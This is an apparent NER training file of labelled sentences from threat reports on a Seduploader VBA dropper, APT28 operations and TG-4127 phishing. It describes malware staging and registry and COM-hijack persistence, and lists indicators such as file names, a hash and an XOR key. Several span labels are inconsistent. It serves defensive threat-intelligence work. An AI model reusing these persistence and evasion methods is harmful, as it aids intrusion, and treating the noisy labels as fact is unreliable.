{"text": "The VBA drops and executes a new variant of Seduploader .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 44, "end": 55, "label": "Malware"}]}
{"text": "This reconnaissance malware has been used by Group 74 for years and it is composed of 2 files : a dropper and a payload .", "spans": [{"start": 45, "end": 53, "label": "Organization"}]}
{"text": "The dropper and the payload are quite similar to the previous versions but the author modified some public information such as MUTEX name , obfuscation .", "spans": []}
{"text": "We assume that these modifications were performed to avoid detection based on public IOCs .", "spans": []}
{"text": "The article describes the malicious document and the Seduploader reconnaissance malware , especially the difference with the previous versions .", "spans": [{"start": 53, "end": 64, "label": "Malware"}]}
{"text": "The decoy document is a flyer concerning the Cyber Conflict U.S. conference with the following filename Conference_on_Cyber_Conflict.doc .", "spans": [{"start": 104, "end": 136, "label": "Indicator"}]}
{"text": "The Office document contains a VBA script .", "spans": [{"start": 4, "end": 10, "label": "System"}, {"start": 31, "end": 34, "label": "System"}]}
{"text": "The goal of this code is to get information from the properties of the document ( \"Subject\" , \"Company\" , \"Category\" , \"Hyperlink base\" and finally \"Comments\" ) .", "spans": []}
{"text": "Some of this information can be directly extracted from the Windows explorer by looking at the properties of the file .", "spans": [{"start": 60, "end": 67, "label": "System"}]}
{"text": "The \"Hyperlink Base\" must be extracted using another tool , strings is capable of obtaining this by looking for long strings .", "spans": []}
{"text": "Pay close attention to the contents of these fields as they appear base64 encoded .", "spans": []}
{"text": "This extracted information is concatenated together to make a single variable .", "spans": []}
{"text": "This variable is decoded with the base64 algorithm in order to get a Windows library ( PE file ) which is written to disk .", "spans": [{"start": 69, "end": 76, "label": "System"}, {"start": 87, "end": 89, "label": "System"}]}
{"text": "The file is named netwf.dat .", "spans": [{"start": 18, "end": 27, "label": "Indicator"}]}
{"text": "On the next step this file is executed by rundll32.exe via the KlpSvc export .", "spans": [{"start": 42, "end": 54, "label": "Indicator"}, {"start": 63, "end": 69, "label": "System"}]}
{"text": "We see that this file drops 2 additional files : netwf.bat and netwf.dll .", "spans": [{"start": 49, "end": 58, "label": "Indicator"}, {"start": 63, "end": 72, "label": "Indicator"}]}
{"text": "The final part of the VBA script changes the properties of these two files , setting their attributes to Hidden .", "spans": [{"start": 22, "end": 25, "label": "System"}]}
{"text": "We can also see 2 VBA variable names : PathPld , probably for Path Payload , and PathPldBt , for Path Payload Batch .", "spans": [{"start": 18, "end": 21, "label": "System"}]}
{"text": "As opposed to previous campaigns performed by this actor , this latest version does not contain privilege escalation and it simply executes the payload and configures persistence mechanisms .", "spans": []}
{"text": "The dropper installs 2 files :", "spans": []}
{"text": "netwf.bat :", "spans": [{"start": 0, "end": 9, "label": "Indicator"}]}
{"text": "executes netwf.dll netwf.dll :", "spans": [{"start": 9, "end": 18, "label": "Indicator"}, {"start": 19, "end": 28, "label": "Indicator"}]}
{"text": "the payload .", "spans": []}
{"text": "The dropper implements 2 persistence mechanisms :", "spans": []}
{"text": "HKCU\\Environment\\UserInitMprLogonScript to execute the netwf.bat file COM Object hijack of the following CLSID : {BCDE0395-E52F-467C-8E3D-C4579291692E} , the CLSID of the class MMDeviceEnumerator .", "spans": [{"start": 55, "end": 64, "label": "Indicator"}, {"start": 105, "end": 110, "label": "System"}, {"start": 158, "end": 163, "label": "System"}]}
{"text": "These 2 techniques have also been previously used by this actor .", "spans": []}
{"text": "Finally the payload is executed by rundll32.exe ( and the ordinal #1 in argument ) or by explorer.exe if the COM Object hijack is performed .", "spans": [{"start": 35, "end": 47, "label": "Indicator"}, {"start": 89, "end": 101, "label": "Indicator"}]}
{"text": "In this case , explorer.exe will instance the MMDeviceEnumerator class and will execute the payload .", "spans": [{"start": 15, "end": 27, "label": "Indicator"}]}
{"text": "The payload features are similar to the previous versions of Seduploader .", "spans": [{"start": 61, "end": 72, "label": "Malware"}]}
{"text": "We can compare it to the sample e338d49c270baf64363879e5eecb8fa6bdde8ad9 used in May 2017 by Group 74 .", "spans": [{"start": 32, "end": 72, "label": "Indicator"}, {"start": 93, "end": 101, "label": "Organization"}]}
{"text": "Of the 195 functions of the new sample , 149 are strictly identical , 16 match at 90% and 2 match at 80% .", "spans": []}
{"text": "In the previous campaign where adversaries used Office document exploits as an infection vector , the payload was executed in the Office word process .", "spans": [{"start": 48, "end": 54, "label": "System"}, {"start": 130, "end": 136, "label": "System"}]}
{"text": "In this campaign , adversaries did not use any exploit .", "spans": []}
{"text": "Instead ,the payload is executed in standalone mode by rundll32.exe .", "spans": [{"start": 55, "end": 67, "label": "Indicator"}]}
{"text": "Adversaries also changed some constants , such as the XOR key used in the previous version .", "spans": []}
{"text": "The key in our version is : key=b\"\\x08\\x7A\\x05\\x04\\x60\\x7c\\x3e\\x3c\\x5d\\x0b\\x18\\x3c\\x55\\x64\" .", "spans": []}
{"text": "The MUTEX name is different too : FG00nxojVs4gLBnwKc7HhmdK0h .", "spans": []}
{"text": "Here are some of the Seduploader features :", "spans": [{"start": 21, "end": 32, "label": "Malware"}]}
{"text": "Screenshot capture ( with the GDI API ) ;", "spans": [{"start": 30, "end": 33, "label": "System"}, {"start": 34, "end": 37, "label": "System"}]}
{"text": "data/configuration Exfiltration ;", "spans": []}
{"text": "Execution of code ;", "spans": []}
{"text": "File downloading ;", "spans": []}
{"text": "The Command & Control ( CC ) of the analysed sample is myinvestgroup[.]com .", "spans": [{"start": 4, "end": 21, "label": "System"}, {"start": 24, "end": 26, "label": "System"}, {"start": 55, "end": 74, "label": "Indicator"}]}
{"text": "During the investigation , the server did not provide any configuration to the infected machines .", "spans": []}
{"text": "Based on the metadata of the Office documents and the PE files , the attackers had created the file on Wednesday , the 4th of October .", "spans": [{"start": 29, "end": 35, "label": "System"}, {"start": 54, "end": 56, "label": "System"}]}
{"text": "Analysis of this campaign shows us once more that attackers are creative and use the news to compromise the targets .", "spans": []}
{"text": "This campaign has most likely been created to allow the targeting of people linked to or interested by cybersecurity , so probably the people who are more sensitive to cybersecurity threats .", "spans": []}
{"text": "In this case , Group 74 did not use an exploit or any 0-day but simply used scripting language embedded within the Microsoft Office document .", "spans": [{"start": 15, "end": 23, "label": "Organization"}, {"start": 54, "end": 59, "label": "Vulnerability"}, {"start": 115, "end": 124, "label": "Organization"}, {"start": 125, "end": 131, "label": "System"}]}
{"text": "Due to this change , the fundamental compromise mechanism is different as the payload is executed in a standalone mode .", "spans": []}
{"text": "The reasons for this are unknown , but , we could suggest that they did not want to utilize any exploits to ensure they remained viable for any other operations .", "spans": []}
{"text": "Actors will often not use exploits due to the fact that researchers can find and eventually patch these which renders the actors weaponized platforms defunct .", "spans": []}
{"text": "Additionally the author did some small updates after publications from the security community , again this is common for actors of this sophisticated nature , once their campaigns have been exposed they will often try to change tooling to ensure better avoidance .", "spans": []}
{"text": "For example the actor changed the XOR key and the MUTEX name .", "spans": []}
{"text": "APT28 : AT THE CENTER OF THE STORM .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]}
{"text": "The Democratic National Committee \u2019s ( DNC ) June 2016 announcement attributing its network breach to the Russian Government triggered an international debate over Russia \u2019s sponsorship of information operations against the U.S.", "spans": [{"start": 4, "end": 33, "label": "Organization"}, {"start": 39, "end": 42, "label": "Organization"}]}
{"text": "Our visibility into the operations of APT28 - a group we believe the Russian Government sponsors - has given us insight into some of the government \u2019s targets , as well as its objectives and the activities designed to further them .", "spans": [{"start": 38, "end": 43, "label": "Organization"}]}
{"text": "We have tracked and profiled this group through multiple investigations , endpoint and network detections , and continuous monitoring .", "spans": []}
{"text": "Our visibility into APT28 \u2019s operations , which date to at least 2007 , has allowed us to understand the group \u2019s malware , operational changes , and motivations .", "spans": [{"start": 20, "end": 25, "label": "Organization"}]}
{"text": "This intelligence has been critical to protecting and informing our clients , exposing this threat , and strengthening our confidence in attributing APT28 to the Russian Government .", "spans": [{"start": 149, "end": 154, "label": "Organization"}]}
{"text": "On December 29 , 2016 , the Department of Homeland Security ( DHS ) and Federal Bureau of Investigation ( FBI ) released a Joint Analysis Report confirming FireEye \u2019s long held public assessment that the Russian Government sponsors APT28 .", "spans": [{"start": 28, "end": 59, "label": "Organization"}, {"start": 62, "end": 65, "label": "Organization"}, {"start": 72, "end": 103, "label": "Organization"}, {"start": 106, "end": 109, "label": "Organization"}, {"start": 156, "end": 163, "label": "Organization"}, {"start": 232, "end": 237, "label": "Organization"}]}
{"text": "Since at least 2007 , APT28 has engaged in extensive operations in support of Russian strategic interests .", "spans": [{"start": 22, "end": 27, "label": "Organization"}]}
{"text": "The group , almost certainly compromised of a sophisticated and prolific set of developers and operators , has historically collected intelligence on defense and geopolitical issues .", "spans": []}
{"text": "APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]}
{"text": "Over the past two years , Russia appears to have increasingly leveraged APT28 to conduct information operations commensurate with broader strategic military doctrine .", "spans": [{"start": 72, "end": 77, "label": "Organization"}]}
{"text": "After compromising a victim organization , APT28 will steal internal data that is then leaked to further political narratives aligned with Russian interests .", "spans": [{"start": 43, "end": 48, "label": "Organization"}]}
{"text": "To date these have included the conflict in Syria , NATO-Ukraine relations , the European Union refugee and migrant crisis , the 2016 Olympics and Paralympics Russian athlete doping scandal , public accusations regarding Russian state-sponsored hacking , and the 2016 U.S. presidential election .", "spans": [{"start": 81, "end": 95, "label": "Organization"}, {"start": 134, "end": 142, "label": "Organization"}, {"start": 147, "end": 158, "label": "Organization"}]}
{"text": "This report details our observations of APT28 \u2019s targeting , and our investigation into a related breach .", "spans": [{"start": 40, "end": 45, "label": "Organization"}]}
{"text": "We also provide an update on shifts in the group \u2019s tool development and use , and summarize the tactics APT28 employs to compromise its victims .", "spans": [{"start": 105, "end": 110, "label": "Organization"}]}
{"text": "In October 2014 , FireEye released APT28 : A Window into Russia \u2019s Cyber Espionage Operations? , and characterized APT28 \u2019s activity as aligning with the Russian Government \u2019s strategic intelligence requirements .", "spans": [{"start": 18, "end": 25, "label": "Organization"}, {"start": 35, "end": 40, "label": "Organization"}, {"start": 45, "end": 51, "label": "System"}, {"start": 115, "end": 120, "label": "Organization"}]}
{"text": "While tracking APT28 , we noted the group \u2019s interest in foreign governments and militaries , particularly those of European and Eastern European nations , as well as regional security organizations , such as the North Atlantic Treaty Organization ( NATO ) and the Organization for Security and Cooperation in Europe ( OSCE ) , among others .", "spans": [{"start": 15, "end": 20, "label": "Organization"}, {"start": 213, "end": 247, "label": "Organization"}, {"start": 250, "end": 254, "label": "Organization"}, {"start": 265, "end": 316, "label": "Organization"}, {"start": 319, "end": 323, "label": "Organization"}]}
{"text": "Table 1 highlights some recent examples of this activity .", "spans": []}
{"text": "OSCE :", "spans": [{"start": 0, "end": 4, "label": "Organization"}]}
{"text": "NOVEMBER 2016 , The OSCE confirmed that it had suffered an intrusion , which a Western intelligence service attributed to APT28 .", "spans": [{"start": 20, "end": 24, "label": "Organization"}, {"start": 122, "end": 127, "label": "Organization"}]}
{"text": "Germany 's Christian Democratic Union ( CDU ) :", "spans": [{"start": 11, "end": 37, "label": "Organization"}, {"start": 40, "end": 43, "label": "Organization"}]}
{"text": "APRIL - MAY 2016 , Researchers at Trend Micro observed APT28 establish a fake CDU email server and launch phishing emails against CDU members in an attempt to obtain their email credentials and access their accounts .", "spans": [{"start": 55, "end": 60, "label": "Organization"}, {"start": 78, "end": 81, "label": "Organization"}, {"start": 82, "end": 87, "label": "System"}, {"start": 115, "end": 121, "label": "System"}, {"start": 130, "end": 133, "label": "Organization"}, {"start": 172, "end": 177, "label": "System"}]}
{"text": "Pussy Riot AUGUST :", "spans": []}
{"text": "2015 , APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": [{"start": 7, "end": 12, "label": "Organization"}, {"start": 82, "end": 88, "label": "System"}]}
{"text": "NATO , Afghan Ministry of Foreign Affairs , Pakistani Military :", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 7, "end": 41, "label": "Organization"}, {"start": 44, "end": 62, "label": "Organization"}]}
{"text": "JULY 2015 , APT28 used two domains ( nato-news.com and bbc-news.org ) to host an Adobe Flash zero-day exploit to target NATO , the Afghan Ministry of Foreign Affairs , and the Pakistani military .", "spans": [{"start": 12, "end": 17, "label": "Organization"}, {"start": 37, "end": 50, "label": "Indicator"}, {"start": 55, "end": 67, "label": "Indicator"}, {"start": 81, "end": 86, "label": "Organization"}, {"start": 87, "end": 92, "label": "System"}, {"start": 93, "end": 101, "label": "Vulnerability"}, {"start": 120, "end": 124, "label": "Organization"}, {"start": 131, "end": 165, "label": "Organization"}, {"start": 176, "end": 194, "label": "Organization"}]}
{"text": "German Bundestag & Political Parties :", "spans": [{"start": 0, "end": 36, "label": "Organization"}]}
{"text": "JUNE 2015 , Germany \u2019s Federal Office for Security in Information Technology ( BSI ) announced that APT28 was likely responsible for the spear phishing emails sent to members of several German political parties .", "spans": [{"start": 100, "end": 105, "label": "Organization"}, {"start": 152, "end": 158, "label": "System"}]}
{"text": "The head of Germany \u2019s domestic intelligence agency , Bundesamt f\u00fcr Verfassungsschutz ( BfV ) , also attributed the June 2015 compromise of the Bundestag \u2019s networks to APT28 .", "spans": [{"start": 54, "end": 85, "label": "Organization"}, {"start": 88, "end": 91, "label": "Organization"}, {"start": 169, "end": 174, "label": "Organization"}]}
{"text": "Kyrgyzstan Ministry of Foreign Affairs :", "spans": [{"start": 0, "end": 38, "label": "Organization"}]}
{"text": "OCTOBER 2014 THROUGH SEPTEMBER 2015 , FireEye iSight Intelligence identified changes made to domain name server ( DNS ) records that suggest that APT28 intercepted email traffic from the Kyrgyzstan Ministry of Foreign Affairs after maliciously modifying DNS records of the ministry \u2019s authoritative DNS servers .", "spans": [{"start": 38, "end": 45, "label": "Organization"}, {"start": 114, "end": 117, "label": "Indicator"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 164, "end": 169, "label": "System"}, {"start": 187, "end": 225, "label": "Organization"}, {"start": 254, "end": 257, "label": "Indicator"}, {"start": 299, "end": 302, "label": "Indicator"}]}
{"text": "Polish Government & Power Exchange websites :", "spans": []}
{"text": "JUNE AND SEPTEMBER 2014 , APT28 employed \u201c Sedkit \u201d in conjunction with strategic web compromises to deliver \u201c Sofacy \u201d malware on Polish Government websites , and the websites of Polish energy company Power Exchange .", "spans": [{"start": 26, "end": 31, "label": "Organization"}, {"start": 43, "end": 49, "label": "Malware"}, {"start": 111, "end": 117, "label": "Malware"}]}
{"text": "On September 13 , WADA confirmed that APT28 had compromised its networks and accessed athlete medical data .", "spans": [{"start": 18, "end": 22, "label": "Organization"}, {"start": 38, "end": 43, "label": "Organization"}]}
{"text": "On September 12 , 2016 , the \u201c Fancy Bears \u2019 Hack Team \u201d persona claimed to have compromised WADA and released athletes \u2019 medical records as \u201c proof of American athletes taking doping. \u201d", "spans": [{"start": 31, "end": 42, "label": "Organization"}, {"start": 93, "end": 97, "label": "Organization"}]}
{"text": "The DNC announced it had suffered a network compromise and that a subsequent investigation found evidence of two breaches , attributed to APT28 and APT29 .", "spans": [{"start": 4, "end": 7, "label": "Organization"}, {"start": 138, "end": 143, "label": "Organization"}, {"start": 148, "end": 153, "label": "Organization"}]}
{"text": "FireEye analyzed the malware found on DNC networks and determined that it was consistent with our previous observations of APT28 tools .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 38, "end": 41, "label": "Organization"}, {"start": 123, "end": 128, "label": "Organization"}]}
{"text": "In June 2016 , shortly after the DNC \u2019s announcement , the Guccifer 2.0 persona claimed responsibility for the DNC breach and leaked documents taken from the organization \u2019s network .", "spans": [{"start": 33, "end": 36, "label": "Organization"}, {"start": 59, "end": 67, "label": "Organization"}, {"start": 111, "end": 114, "label": "Organization"}]}
{"text": "Guccifer 2.0 continued to leak batches of DNC documents through September .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 42, "end": 45, "label": "Organization"}]}
{"text": "Investigators found that John Podesta , Hillary Clinton \u2019s presidential campaign chairman , was one of thousands of individuals targeted in a mass phishing scheme using shortened URLs that security researchers attributed to APT28 .", "spans": [{"start": 224, "end": 229, "label": "Organization"}]}
{"text": "Throughout October and into early November , WikiLeaks published 34 batches of email correspondence stolen from John Podesta \u2019s personal email account .", "spans": [{"start": 45, "end": 54, "label": "System"}, {"start": 79, "end": 84, "label": "System"}, {"start": 137, "end": 142, "label": "System"}]}
{"text": "Correspondence of other individuals targeted in the same phishing campaign , including former Secretary of State Colin Powell and Clinton campaign staffer William Rinehart , were published on the \u201c DC Leaks \u201d website .", "spans": []}
{"text": "In July , the DCCC announced that it was investigating an ongoing \u201c cybersecurity incident \u201d that the FBI believed was linked to the compromise of the DNC .", "spans": [{"start": 14, "end": 18, "label": "Organization"}, {"start": 102, "end": 105, "label": "Organization"}, {"start": 151, "end": 154, "label": "Organization"}]}
{"text": "House Speaker Nancy Pelosi later confirmed that the DCCC had suffered a network compromise .", "spans": [{"start": 52, "end": 56, "label": "Organization"}]}
{"text": "Investigators indicated that the actors may have gained access to DCCC systems as early as March .", "spans": [{"start": 66, "end": 70, "label": "Organization"}]}
{"text": "In August , the Guccifer 2.0 persona contacted reporters covering U.S. House of Representative races to announce newly leaked documents from the DCCC pertaining to Democratic candidates .", "spans": [{"start": 16, "end": 24, "label": "Organization"}, {"start": 71, "end": 94, "label": "Organization"}, {"start": 145, "end": 149, "label": "Organization"}]}
{"text": "From August to October , Guccifer 2.0 posted several additional installments of what appear to be internal DCCC documents on \u201c his \u201d WordPress site .", "spans": [{"start": 25, "end": 33, "label": "Organization"}, {"start": 107, "end": 111, "label": "Organization"}]}
{"text": "In February , FireEye identified CORESHELL traffic beaconing from TV5Monde \u2019s network , confirming that APT28 had compromised TV5Monde \u2019s network .", "spans": [{"start": 14, "end": 21, "label": "Organization"}, {"start": 33, "end": 42, "label": "System"}, {"start": 66, "end": 74, "label": "Organization"}, {"start": 104, "end": 109, "label": "Organization"}, {"start": 126, "end": 134, "label": "Organization"}]}
{"text": "In April 2015 , alleged pro-ISIS hacktivist group CyberCaliphate defaced TV5Monde \u2019s websites and social media profiles and forced the company \u2019s 11 broadcast channels offline .", "spans": [{"start": 50, "end": 64, "label": "Organization"}, {"start": 73, "end": 81, "label": "Organization"}]}
{"text": "FireEye identified overlaps between the domain registration details of CyberCaliphate \u2019s website and APT28 infrastructure .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 71, "end": 85, "label": "Organization"}, {"start": 101, "end": 106, "label": "Organization"}]}
{"text": "Ukrainian officials revealed that the investigation into the compromise of the CEC \u2019s internal network identified malware traced to APT28 .", "spans": [{"start": 79, "end": 82, "label": "Organization"}, {"start": 132, "end": 137, "label": "Organization"}]}
{"text": "During the May 2014 Ukrainian presidential election , purported pro-Russian hacktivists CyberBerkut conducted a series of malicious activities against the CEC including a system compromise , data destruction , a data leak , a distributed denial-of-service ( DDoS ) attack , and an attempted defacement of the CEC website with fake election results .", "spans": [{"start": 88, "end": 99, "label": "Organization"}, {"start": 155, "end": 158, "label": "Organization"}, {"start": 309, "end": 312, "label": "Organization"}]}
{"text": "As news of the DNC breach spread , APT28 was preparing for another set of operations : countering the condemnation that Russia was facing after doping allegations and a threatened blanket ban of the Russian team from the upcoming Rio Games .", "spans": [{"start": 15, "end": 18, "label": "Organization"}, {"start": 35, "end": 40, "label": "Organization"}, {"start": 230, "end": 239, "label": "Organization"}]}
{"text": "Russia , like many nations , has long viewed success in the Olympic Games as a source of national prestige and soft power on the world stage .", "spans": []}
{"text": "The doping allegations and prospective ban from the Games further ostracized Russia , and likely provided motivation to actively counter the allegations by attempting to discredit anti-doping agencies and policies .", "spans": []}
{"text": "Our investigation of APT28 \u2019s compromise of WADA \u2019s network , and our observations of the surrounding events reveal how Russia sought to counteract a damaging narrative and delegitimize the institutions leveling criticism .", "spans": [{"start": 21, "end": 26, "label": "Organization"}, {"start": 44, "end": 48, "label": "Organization"}]}
{"text": "Since releasing our 2014 report , we continue to assess that APT28 is sponsored by the Russian Government .", "spans": [{"start": 61, "end": 66, "label": "Organization"}]}
{"text": "We further assess that APT28 is the group responsible for the network compromises of WADA and the DNC and other entities related to the 2016 U.S. presidential election cycle .", "spans": [{"start": 23, "end": 28, "label": "Organization"}, {"start": 85, "end": 89, "label": "Organization"}, {"start": 98, "end": 101, "label": "Organization"}]}
{"text": "These breaches involved the theft of internal data - mostly emails \u2013 that was later strategically leaked through multiple forums and propagated in a calculated manner almost certainly intended to advance particular Russian Government aims .", "spans": [{"start": 60, "end": 66, "label": "System"}]}
{"text": "In a report released on January 7 2017 , the U.S. Directorate of National Intelligence described this activity as an \u201c influence campaign. \u201d This influence campaign - a combination of network compromises and subsequent data leaks - aligns closely with the Russian military \u2019s publicly stated intentions and capabilities .", "spans": [{"start": 50, "end": 86, "label": "Organization"}]}
{"text": "Influence operations , also frequently called \u201c information operations , \u201d have a long history of inclusion in Russian strategic doctrine , and have been intentionally developed , deployed , and modernized with the advent of the internet .", "spans": []}
{"text": "The recent activity in the U.S. is but one of many instances of Russian Government influence operations conducted in support of strategic political objectives , and it will not be the last .", "spans": []}
{"text": "As the 2017 elections in Europe approach - most notably in Germany , France , and the Netherlands - we are already seeing the makings of similarly concerted efforts .", "spans": []}
{"text": "In our 2014 report , we identified APT28 as a suspected Russian government-sponsored espionage actor .", "spans": [{"start": 35, "end": 40, "label": "Organization"}]}
{"text": "We came to this conclusion in part based on forensic details left in the malware that APT28 had employed since at least 2007 .", "spans": [{"start": 86, "end": 91, "label": "Organization"}]}
{"text": "We have provided an updated version of those conclusions , a layout of the tactics that they generally employ , as well as observations of apparent tactical shifts .", "spans": []}
{"text": "For full details , please reference our 2014 report , APT28 : A Window into Russia \u2019s Cyber Espionage Operations ? APT28 employs a suite of malware with features indicative of the group \u2019s plans for continued operations , as well as the group \u2019s access to resources and skilled developers .", "spans": [{"start": 54, "end": 59, "label": "Organization"}, {"start": 64, "end": 70, "label": "System"}, {"start": 115, "end": 120, "label": "Organization"}]}
{"text": "CHOPSTICK :", "spans": [{"start": 0, "end": 9, "label": "Malware"}]}
{"text": "backdoor , Xagent , webhp , SPLM .", "spans": [{"start": 11, "end": 17, "label": "Malware"}, {"start": 20, "end": 25, "label": "Malware"}, {"start": 28, "end": 32, "label": "Malware"}]}
{"text": "EVILTOSS :", "spans": [{"start": 0, "end": 8, "label": "Malware"}]}
{"text": "backdoor , Sedreco , AZZY , Xagent , ADVSTORESHELL , NETUI .", "spans": [{"start": 11, "end": 18, "label": "Malware"}, {"start": 21, "end": 25, "label": "Malware"}, {"start": 28, "end": 34, "label": "Malware"}, {"start": 37, "end": 50, "label": "Malware"}, {"start": 53, "end": 58, "label": "Malware"}]}
{"text": "GAMEFISH :", "spans": [{"start": 0, "end": 8, "label": "Malware"}]}
{"text": "backdoor , Sednit , Seduploader , JHUHUGIT , Sofacy .", "spans": [{"start": 11, "end": 17, "label": "Malware"}, {"start": 20, "end": 31, "label": "Malware"}, {"start": 34, "end": 42, "label": "Malware"}, {"start": 45, "end": 51, "label": "Malware"}]}
{"text": "SOURFACE :", "spans": [{"start": 0, "end": 8, "label": "Malware"}]}
{"text": "downloader , Older version of CORESHELL , Sofacy .", "spans": [{"start": 30, "end": 39, "label": "Malware"}, {"start": 42, "end": 48, "label": "Malware"}]}
{"text": "OLDBAIT :", "spans": [{"start": 0, "end": 7, "label": "Malware"}]}
{"text": "credential harvester , Sasfis .", "spans": [{"start": 23, "end": 29, "label": "Malware"}]}
{"text": "CORESHELL :", "spans": [{"start": 0, "end": 9, "label": "Malware"}]}
{"text": "downloader , Newer version of SOURFACE , Sofacy .", "spans": [{"start": 30, "end": 38, "label": "Malware"}, {"start": 41, "end": 47, "label": "Malware"}]}
{"text": "APT28 continues to evolve its toolkit and refine its tactics in what is almost certainly an effort to protect its operational effectiveness in the face of heightened public exposure and scrutiny .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]}
{"text": "In addition to the continued evolution of the group \u2019s first stage tools , we have also noted APT28 : Leveraging zero-day vulnerabilities in Adobe Flash Player , Java , and Windows , including CVE-2015-1701 , CVE-2015-2424 , CVE-2015-2590 , CVE-2015-3043 , CVE-2015-5119 , and CVE-2015-7645 .", "spans": [{"start": 94, "end": 99, "label": "Organization"}, {"start": 113, "end": 121, "label": "Vulnerability"}, {"start": 141, "end": 146, "label": "Organization"}, {"start": 147, "end": 152, "label": "System"}, {"start": 153, "end": 159, "label": "System"}, {"start": 162, "end": 166, "label": "System"}, {"start": 173, "end": 180, "label": "System"}, {"start": 193, "end": 206, "label": "Vulnerability"}, {"start": 209, "end": 222, "label": "Vulnerability"}, {"start": 225, "end": 238, "label": "Vulnerability"}, {"start": 241, "end": 254, "label": "Vulnerability"}, {"start": 257, "end": 270, "label": "Vulnerability"}, {"start": 277, "end": 290, "label": "Vulnerability"}]}
{"text": "Using a profiling script to deploy zero-days and other tools more selectively , decreasing the chance that researchers and others will gain access to the group \u2019s tools .", "spans": [{"start": 35, "end": 44, "label": "Vulnerability"}]}
{"text": "Increasing reliance on public code depositories , such as Carberp , PowerShell Empire , P.A.S. webshell , Metasploit modules , and others in a likely effort to accelerate their development cycle and provide plausible deniability .", "spans": [{"start": 58, "end": 65, "label": "Malware"}, {"start": 68, "end": 78, "label": "System"}, {"start": 79, "end": 85, "label": "System"}, {"start": 88, "end": 94, "label": "System"}, {"start": 106, "end": 116, "label": "System"}]}
{"text": "Obtaining credentials through fabricated Google App authorization and Oauth access requests that allow the group to bypass two-factor authentication and other security measures .", "spans": [{"start": 41, "end": 47, "label": "Organization"}, {"start": 70, "end": 75, "label": "Indicator"}]}
{"text": "Moving laterally through a network relying only on legitimate tools that already exist within the victims \u2019 systems , at times forgoing their traditional toolset for the duration of the compromise .", "spans": []}
{"text": "Threat Group 4127 Targets Hillary Clinton Presidential Campaign .", "spans": [{"start": 0, "end": 17, "label": "Organization"}]}
{"text": "The Hillary Clinton email leak was the center of the latest scandal in the news caused by Threat Group-4127 ( TG-4127 ) .", "spans": [{"start": 20, "end": 25, "label": "System"}, {"start": 90, "end": 107, "label": "Organization"}, {"start": 110, "end": 117, "label": "Organization"}]}
{"text": "SecureWorks Counter Threat Unit ( CTU ) researchers track the activities of Threat Group-4127 , which targets governments , military , and international non-governmental organizations ( NGOs ) .", "spans": [{"start": 0, "end": 31, "label": "Organization"}, {"start": 34, "end": 37, "label": "Organization"}, {"start": 76, "end": 93, "label": "Organization"}]}
{"text": "Components of TG-4127 operations have been reported under the names APT28 , Sofacy , Sednit , and Pawn Storm .", "spans": [{"start": 14, "end": 21, "label": "Organization"}, {"start": 68, "end": 73, "label": "Organization"}, {"start": 76, "end": 82, "label": "Organization"}, {"start": 85, "end": 91, "label": "Organization"}, {"start": 98, "end": 108, "label": "Organization"}]}
{"text": "CTU researchers assess with moderate confidence that the group is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]}
{"text": "Between October 2015 and May 2016 , CTU researchers analyzed 8,909 Bitly links that targeted 3,907 individual Gmail accounts and corporate and organizational email accounts that use Gmail as a service .", "spans": [{"start": 36, "end": 39, "label": "Organization"}, {"start": 67, "end": 72, "label": "System"}, {"start": 110, "end": 115, "label": "System"}, {"start": 158, "end": 163, "label": "System"}, {"start": 182, "end": 187, "label": "System"}]}
{"text": "In March 2016 , CTU researchers identified a spearphishing campaign using Bitly accounts to shorten malicious URLs .", "spans": [{"start": 16, "end": 19, "label": "Organization"}, {"start": 74, "end": 79, "label": "System"}]}
{"text": "The targets were similar to a 2015 TG-4127 campaign \u2014 individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. and Europe , individuals working in the defense and government supply chain , and authors and journalists \u2014 but also included email accounts linked to the November 2016 United States presidential election .", "spans": [{"start": 35, "end": 42, "label": "Organization"}, {"start": 298, "end": 303, "label": "System"}]}
{"text": "Specific targets include staff working for or associated with Hillary Clinton's presidential campaign and the Democratic National Committee ( DNC ) , including individuals managing Clinton's communications , travel , campaign finances , and advising her on policy .", "spans": [{"start": 110, "end": 139, "label": "Organization"}, {"start": 142, "end": 145, "label": "Organization"}]}
{"text": "The short links in the spearphishing emails redirected victims to a TG-4127 controlled URL that spoofed a legitimate Google domain .", "spans": [{"start": 37, "end": 43, "label": "System"}, {"start": 68, "end": 75, "label": "Organization"}, {"start": 117, "end": 123, "label": "Organization"}]}
{"text": "A Base64 encoded string containing the victim's full email address is passed with this URL , prepopulating a fake Google login page displayed to the victim .", "spans": [{"start": 53, "end": 58, "label": "System"}, {"start": 114, "end": 120, "label": "Organization"}]}
{"text": "If a victim enters their credentials , TG-4127 can establish a session with Google and access the victim's account .", "spans": [{"start": 39, "end": 46, "label": "Organization"}, {"start": 76, "end": 82, "label": "Organization"}]}
{"text": "The threat actors may be able to keep this session alive and maintain persistent access .", "spans": []}
{"text": "The Hillary for America presidential campaign owns the hillaryclinton.com domain , which is used for the campaign website ( www.hillaryclinton.com ) and for email addresses used by campaign staff .", "spans": [{"start": 55, "end": 73, "label": "Indicator"}, {"start": 124, "end": 146, "label": "Indicator"}, {"start": 157, "end": 162, "label": "System"}]}
{"text": "An examination of the hillaryclinton.com DNS records shows that the domain's MX records , which indicate the mail server used by the domain , point to aspmx.l.google.com , the mail server used by Google Apps .", "spans": [{"start": 22, "end": 40, "label": "Indicator"}, {"start": 41, "end": 44, "label": "Indicator"}, {"start": 77, "end": 79, "label": "System"}, {"start": 151, "end": 169, "label": "Indicator"}, {"start": 196, "end": 202, "label": "Organization"}]}
{"text": "Google Apps allows organizations to use Gmail as their organizational mail solution .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 40, "end": 45, "label": "System"}]}
